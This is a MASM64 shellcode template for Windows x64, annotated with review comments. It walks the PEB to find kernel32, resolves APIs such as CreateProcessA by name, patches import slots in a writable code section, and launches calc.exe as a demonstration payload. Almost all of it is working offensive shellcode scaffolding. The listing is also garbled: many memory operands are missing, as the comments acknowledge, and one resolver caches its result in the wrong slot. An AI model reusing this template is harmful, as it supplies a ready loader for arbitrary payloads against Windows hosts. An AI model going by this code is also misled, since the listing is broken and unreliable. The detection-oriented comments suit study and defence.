Masm64 shellcode template
编译工具: VS 或者 DDK 携带的汇编编译器 ml64
option casemap:none
;--------------------------------------------------------------------------------
;set name=Shellcode
;ml /c /coff /Cp /Fl /Gd /nologo %name%.asm
;link /SUBSYSTEM:CONSOLE /DEBUG /DEBUGTYPE:CV %name%.obj /OUT:%name%.exe
;PAUSE
;--------------------------------------------------------------------------------
include shellcode.inc
include macro.asm
;--------------------------------------------------------------------------------
; Section "SHELL": everything from here to the plain `.code` section near the
; end is the shellcode body; the normal .code section only hosts a test driver.
; The first instruction of the section is this jump, so execution that begins
; at the section's first byte lands in _main.
; The trailing numbers in this section's comments (;5 ;8 ;1 ;2) appear to be
; the encoded size in bytes of each instruction/data item; layout is load-
; bearing because inline data is located by call/pop, not by relocations.
;--------------------------------------------------------------------------------
.code SHELL
jmp _main ;5 bytes (rel32 jump) — entry of the blob
;--------------------------------------------------------------------------------
; _thunk — shared tail-jump through an import slot.
; Every stub below ends with `pop rax` (rax = address of its _imp__ slot) and
; `jmp _thunk`, so the memory operand here must be the QWORD rax points at.
; The bracketed operand is missing from this listing — TODO confirm against
; the original source. No frame, no ret: control never comes back here.
; On first use the slot holds a resolver (_thunk__*); afterwards the real API.
;--------------------------------------------------------------------------------
_thunk proc
jmp QWORD ptr ;2 bytes — indirect jump via the slot; operand lost in extraction
_thunk endp
;--------------------------------------------------------------------------------
; CreateProcessA — import stub. The caller's arguments (rcx,rdx,r8,r9 and the
; stack) are passed through untouched; only rax is used.
; Layout is fixed: `call @F` pushes the address of the 8-byte slot right after
; it, the slot is skipped, and `pop rax` yields &_imp__CreateProcessA.
; The slot starts out pointing at the resolver _thunk__CreateProcessA, which
; overwrites it with the real export address (see that proc). Because the slot
; lives inside this code section and is written at run time, the section has
; to be writable as well as executable; a writable code section and self-
; patching stubs are a well-known detection signal in their own right.
; `offset _thunk__CreateProcessA` is an absolute 64-bit address, i.e. it needs
; a base relocation if the blob is placed anywhere but its link address.
;--------------------------------------------------------------------------------
CreateProcessA proc
call @F ;5 bytes — push &slot, jump over the slot
_imp__CreateProcessA QWORD offset _thunk__CreateProcessA ;8 bytes — import slot (data inside .code)
@@:
pop rax ;1 byte — rax = &_imp__CreateProcessA
jmp _thunk ;2 bytes — jump through the slot
CreateProcessA endp
;--------------------------------------------------------------------------------
; CloseHandle — import stub, same call/slot/pop layout as CreateProcessA above.
; rax = &_imp__CloseHandle on the way into _thunk; arguments pass through.
; Slot initially points at the resolver _thunk__CloseHandle. Note that
; _thunk__GetStartupInfo (below) also stores into this slot, so its contents
; can change after a GetStartupInfo call — see the comment on that proc.
;--------------------------------------------------------------------------------
CloseHandle proc
call @F ; push &slot, skip over it
_imp__CloseHandle QWORD offset _thunk__CloseHandle ; import slot (written at run time)
@@:
pop rax ; rax = &_imp__CloseHandle
jmp _thunk
CloseHandle endp
;--------------------------------------------------------------------------------
; GetStartupInfo — import stub, same layout as CreateProcessA above.
; rax = &_imp__GetStartupInfoA on the way into _thunk.
; As written, the resolver _thunk__GetStartupInfo never updates this slot (it
; stores into _imp__CloseHandle instead), so every call would go through the
; resolver again. _main does not call GetStartupInfo, so this path is unused
; in the template as shown.
;--------------------------------------------------------------------------------
GetStartupInfo proc
call @F ; push &slot, skip over it
_imp__GetStartupInfoA QWORD offset _thunk__GetStartupInfo ; import slot
@@:
pop rax ; rax = &_imp__GetStartupInfoA
jmp _thunk
GetStartupInfo endp
;--------------------------------------------------------------------------------
; _KernelBase — find a system DLL's image base without an import table.
; Out:   rax = the value _GetProcAddress expects in rcx as a module base (it is
;        validated there by the "MZ" / "PE" / PE32+ checks).
; Clobb: rax, rcx, rdx, no flags assumptions. Leaf; no frame.
; Path: TEB (via gs:) -> PEB -> PEB_LDR_DATA -> InInitializationOrderModuleList,
; then follows Flink/Blink across list entries. The bracketed [reg+disp]
; operands were dropped in extraction, so which entry ends up in rax cannot be
; verified from this listing; the original comments claim ntdll, KERNELBASE,
; kernel32 in that order. rdx and rcx are loaded but not consumed before `ret`
; (every caller overwrites both), so they look like leftovers.
; This TEB/PEB/Ldr walk is the canonical "resolve APIs without imports"
; pattern and a standard target for memory-scanner and YARA rules.
;--------------------------------------------------------------------------------
_KernelBase proc
mov rax,(_TEB ptr gs:).NtTib.Self ; rax = TEB self pointer (read through gs)
mov rax,(_TEB ptr ).ProcessEnvironmentBlock ; rax = PEB
mov rax,(_PEB ptr ).Ldr ; rax = PEB_LDR_DATA
mov rax,(_PEB_LDR_DATA ptr ).InInitializationOrderModuleList.Flink ; first list entry
mov rdx,(_LIST_ENTRY ptr ).Blink ;ntdll (per original comment; rdx unused afterwards)
mov rax,(_LIST_ENTRY ptr ).Flink ; next entry
mov rcx,(_LIST_ENTRY ptr ).Blink;KERNELBASE (per original comment; rcx unused afterwards)
mov rax,(_LIST_ENTRY ptr ).Flink ; next entry
mov rax,(_LIST_ENTRY ptr ).Blink;kernel32 (per original comment) — returned in rax
ret
_KernelBase endp
;--------------------------------------------------------------------------------
; _StrLen — byte count of a NUL-terminated string INCLUDING the terminator.
; In:    rax = string (non-ABI: argument and result both in rax)
; Out:   rax = strlen(s) + 1. rcx starts at -1 and scasb consumes n+1 bytes
;        (the NUL too), leaving rcx = -(n+2); NOT rcx = n+1.
; rdi and rcx are saved/restored by the `uses` prologue/epilogue. Relies on
; DF being clear (no cld here). Unbounded: an unterminated buffer is scanned
; until the first NUL byte or a fault.
;--------------------------------------------------------------------------------
_StrLen proc uses rdi rcx
or rcx,-1 ; rcx = maximum count
mov rdi,rax ; rdi = scan pointer
xor rax,rax ; al = 0 is the byte scasb searches for
repne scasb ; advance until [rdi] == 0; the NUL is consumed too
not rcx ; rcx = bytes consumed = n + 1
mov rax,rcx
ret
_StrLen endp
;--------------------------------------------------------------------------------
; _StrCmp — equality test for two NUL-terminated strings.
; In:    rsi = string A, rdi = string B
; Out:   rax = 0 when identical (same length and every byte incl. NUL equal);
;        non-zero otherwise: strlen(B)+1 when the lengths differ, else the
;        number of bytes left unchecked after the first mismatch.
; rcx, rsi, rdi restored via `uses` (cmpsb advances rsi/rdi). Relies on DF
; clear. No ordering information, only equal / not equal.
;--------------------------------------------------------------------------------
_StrCmp proc uses rcx rsi rdi
mov rax,rsi
call _StrLen ; rax = len(A)+1
mov rcx,rax ; rcx = len(A)+1, survives the next call (_StrLen preserves rcx)
mov rax,rdi
call _StrLen ; rax = len(B)+1
cmp rax,rcx
jnz @F ; lengths differ: rax (non-zero) is the result
repe cmpsb ; compare rcx bytes, stop at the first mismatch
mov rax,rcx ; 0 iff all bytes matched
@@:
ret
ret ; unreachable — duplicate of the ret above
_StrCmp endp
;--------------------------------------------------------------------------------
; _GetProcAddress — look up an export by name in an in-memory PE32+ image;
; the template's stand-in for kernel32!GetProcAddress.
; In:    rcx = module base, rdx = NUL-terminated export name
; Out:   rax = absolute address of the export, or 0 when the image fails the
;        "MZ" / "PE" / PE32+ checks or the name is not found.
; Clobb: rax, r8, r9, flags; rcx and rdx are not written; rsi, rdi, rbx are
;        restored via `uses`.
; Several memory operands were lost in extraction: the lines reading
; `mov eax,` / `mov si,` / `cmp si,` / `movzx eax,word ptr` / `mov ebx,...
; DataDirectory` are incomplete in this listing and must not be taken at face
; value. Labels `re` and `done` are proc-local in MASM.
; Not handled: forwarded exports (the RVA found then points at a string, not
; code) and an image without an export directory.
; Plaintext export names compared here are straightforward string IoCs.
;--------------------------------------------------------------------------------
_GetProcAddress proc uses rsi rdi rbx
mov rsi,rcx ; rsi = base; rcx keeps the base for the RVA -> VA adds below
mov ax,(IMAGE_DOS_HEADER ptr ).e_magic
cmp ax,"ZM" ; "MZ" read as a little-endian word
jz @F
xor rax,rax ; no DOS header -> 0
jmp done
@@:
mov ebx,(IMAGE_DOS_HEADER ptr ).e_lfanew ; RVA of the NT headers
add rbx,rsi ; rbx = IMAGE_NT_HEADERS
mov eax,(IMAGE_NT_HEADERS ptr ).Signature
cmp eax,"EP" ; "PE\0\0" read as a little-endian dword
jz @F
xor rax,rax ; no PE signature -> 0
jmp done
@@:
lea rbx,(IMAGE_NT_HEADERS ptr ).OptionalHeader
mov ax,(_IMAGE_OPTIONAL_HEADER64 ptr ).Magic
cmp ax,20Bh ; 20Bh = PE32+; anything else (e.g. 10Bh = PE32) is rejected
jz @F
;PE 32
xor rax,rax ; not a 64-bit image -> 0
jmp done
@@:
EXP EQU IMAGE_DIRECTORY_ENTRY_EXPORT*SizeOf _IMAGE_DATA_DIRECTORY ; byte offset of the export entry in DataDirectory
mov ebx,(_IMAGE_OPTIONAL_HEADER64 ptr ).DataDirectory ; export directory RVA (index operand lost in extraction)
add rbx,rcx ; rbx = IMAGE_EXPORT_DIRECTORY
mov r9d,(IMAGE_EXPORT_DIRECTORY ptr ).AddressOfNames
add r9,rcx ; r9 = name-RVA table (VA)
xor r8,r8 ; r8 = name index
re: ; for each exported name
mov eax, ; eax = RVA of name r8 (operand lost in extraction)
add rax,rcx ; rax = name (VA)
mov si, ; first two bytes of the candidate (operand lost)
cmp si, ; quick reject on the first two bytes of the wanted name (operand lost)
jnz @F
mov rsi,rax ; A = candidate
mov rdi,rdx ; B = wanted name
call _StrCmp ; rax = 0 on match
or rax,rax
jnz @F
mov edi,(IMAGE_EXPORT_DIRECTORY ptr ).AddressOfFunctions
add rdi,rcx ; rdi = function-RVA table (VA)
mov eax,(IMAGE_EXPORT_DIRECTORY ptr ).AddressOfNameOrdinals
add rax,rcx ; rax = ordinal table (VA)
movzx eax,word ptr ; eax = ordinal for name r8 (operand lost)
mov eax, ; eax = function RVA at that ordinal (operand lost)
add rax,rcx ; rax = function VA — result
jmp done
@@:
inc r8
cmp r8d,(IMAGE_EXPORT_DIRECTORY ptr ).NumberOfNames
jb re ; unsigned compare, correct for a count
xor rax,rax ; not found -> 0
done:
ret
_GetProcAddress endp
;--------------------------------------------------------------------------------
; _thunk__CreateProcessA — first-call resolver behind the CreateProcessA stub.
; Entered via `jmp _thunk` with the original caller's return address on top of
; the stack and its arguments still in rcx,rdx,r8,r9. Resolves the export,
; caches it in _imp__CreateProcessA, restores the registers and transfers to
; the real API with `push rax / ret`, so the API returns to the original
; caller as if the stub were never there.
; The API name is an inline NUL-terminated string located by call/pop.
; Writes into the code section (the _imp__ slot): needs a writable .text-like
; section; self-patching plus a plaintext name scan is exactly the behaviour
; memory scanners key on. Internal calls reserve no shadow space; they are
; not ABI functions.
; If _GetProcAddress returns 0 the tail `push rax / ret` transfers to address
; 0 — there is no failure check.
;--------------------------------------------------------------------------------
_thunk__CreateProcessA proc
push r9 ; preserve the caller's four register arguments
push r8
push rdx
push rcx
call _KernelBase ; rax = DLL base (see _KernelBase)
mov rcx,rax ; arg: module base
call @F ; push the address of the string below
byte "CreateProcessA",0 ; inline name, plaintext in the blob
@@:
pop rdx ; arg: export name
call _GetProcAddress ; rax = resolved address or 0
mov _imp__CreateProcessA,rax ; cache: later calls go straight through the slot
pop rcx ; restore the caller's argument registers
pop rdx
pop r8
pop r9
push rax ; "return" into the resolved API; the caller's own return
ret ; address is on top again, so the API returns past the stub
_thunk__CreateProcessA endp
;--------------------------------------------------------------------------------
; _thunk__CloseHandle — first-call resolver behind the CloseHandle stub.
; Identical in shape to _thunk__CreateProcessA: save the argument registers,
; resolve "CloseHandle" from the base returned by _KernelBase, cache the
; result in _imp__CloseHandle, restore registers and `push rax / ret` into
; the API. No check for a 0 result from _GetProcAddress.
;--------------------------------------------------------------------------------
_thunk__CloseHandle proc
push r9 ; preserve the caller's argument registers
push r8
push rdx
push rcx
call _KernelBase ; rax = DLL base
mov rcx,rax ; arg: module base
call @F ; push the address of the string below
byte "CloseHandle",0 ; inline name, plaintext in the blob
@@:
pop rdx ; arg: export name
call _GetProcAddress ; rax = resolved address or 0
mov _imp__CloseHandle,rax ; cache into this stub's own slot
pop rcx ; restore the caller's argument registers
pop rdx
pop r8
pop r9
push rax ; transfer to the resolved API
ret
_thunk__CloseHandle endp
;--------------------------------------------------------------------------------
; _thunk__GetStartupInfo — first-call resolver behind the GetStartupInfo stub.
; Same shape as _thunk__CreateProcessA, resolving "GetStartupInfoA".
; NOTE(review): the result is stored into _imp__CloseHandle, not
; _imp__GetStartupInfoA (compare the two resolvers above). As written, the
; GetStartupInfo slot is never updated and the CloseHandle slot is replaced
; with GetStartupInfoA's address after any call through this stub. Looks like
; a copy-paste slip; _main never calls GetStartupInfo, so it is not exercised
; here — confirm intent before relying on either stub.
;--------------------------------------------------------------------------------
_thunk__GetStartupInfo proc
push r9 ; preserve the caller's argument registers
push r8
push rdx
push rcx
call _KernelBase ; rax = DLL base
mov rcx,rax ; arg: module base
call @F ; push the address of the string below
byte "GetStartupInfoA",0 ; inline name, plaintext in the blob
@@:
pop rdx ; arg: export name
call _GetProcAddress ; rax = resolved address or 0
mov _imp__CloseHandle,rax ; writes the CloseHandle slot, not _imp__GetStartupInfoA (see header)
pop rcx ; restore the caller's argument registers
pop rdx
pop r8
pop r9
push rax ; transfer to the resolved API
ret
_thunk__GetStartupInfo endp
;--------------------------------------------------------------------------------
; _main — payload body.
; In:    rcx = first argument to CreateProcessA (the caller supplies the
;        string; see WinMainCRTStartup).
; Does:  CreateProcessA(rcx, 0, 0, 0, 0, 0, 0, 0, &_si, &_pi); when it returns
;        non-zero, CloseHandle on _pi.hThread and _pi.hProcess.
; Out:   no defined return value — eax is whatever the last call left.
; @LOCAL / END_LOCAL / fastcall / EPILOG come from macro.asm (included above,
; not visible here); presumably frame setup, stack-argument passing and
; teardown. `END_LOCAL QWORD * 10` looks like the outgoing area for a
; 10-argument call — TODO confirm it also keeps rsp 16-aligned at each
; fastcall site, since _main is entered from WinMainCRTStartup with
; rsp % 16 == 0 rather than the ABI's 8.
; Only STARTUPINFO.cb is zeroed (to 0, not sizeof(STARTUPINFO)); the other
; _si fields keep whatever was on the stack unless END_LOCAL zero-fills —
; TODO confirm.
; Any pen-tester or IR analyst will recognise this as the process-launch
; primitive of the template; the interesting telemetry is the process
; creation plus the PEB walk that precedes it.
;--------------------------------------------------------------------------------
_main proc uses rdi
@LOCAL _si,STARTUPINFO ; STARTUPINFO on the stack (macro)
@LOCAL _pi,PROCESS_INFORMATION ; PROCESS_INFORMATION on the stack (macro)
END_LOCAL QWORD * 10 ; reserve outgoing argument space (macro; see header)
and (STARTUPINFO ptr _si).cb,0 ; _si.cb = 0; remaining fields untouched
fastcall CreateProcessA,rcx,0,0,0,0,0,0,0,addr _si,addr _pi ; through the import stub
or eax,eax ; BOOL result
jz @F ; failed: nothing to close
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hThread ; release the returned handles
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hProcess
@@:
EPILOG ; frame teardown (macro)
ret
_main endp
;--------------------------------------------------------------------------------
; Plain .code section: a test driver that exercises the SHELL section from an
; ordinary EXE. Not part of the payload.
; WinMainCRTStartup — no-CRT entry point. Loads rcx with the address of the
; inline "calc.exe" string via call/pop and calls _main.
; The three `int 3` are hard breakpoints for stepping in a debugger; outside a
; debugger each raises EXCEPTION_BREAKPOINT and, with no handler installed
; here, terminates the process — keep them out of any non-debug build.
; Alignment: entry rsp % 16 == 8; call/pop nets zero; so `call _main` enters
; _main with rsp % 16 == 0, not the ABI's 8 (see the note on _main).
;--------------------------------------------------------------------------------
.code
WinMainCRTStartup proc
int 3 ; debugger breakpoint (debug build only)
call @F ; push the address of the string below
byte "calc.exe",0 ; inline argument string
@@:
pop rcx ; rcx = &"calc.exe" -> _main's first argument
int 3 ; debugger breakpoint (debug build only)
call _main
int 3 ; debugger breakpoint (debug build only)
ret
WinMainCRTStartup endp
end
有bug反馈, 不定时间处理。支持Ayala!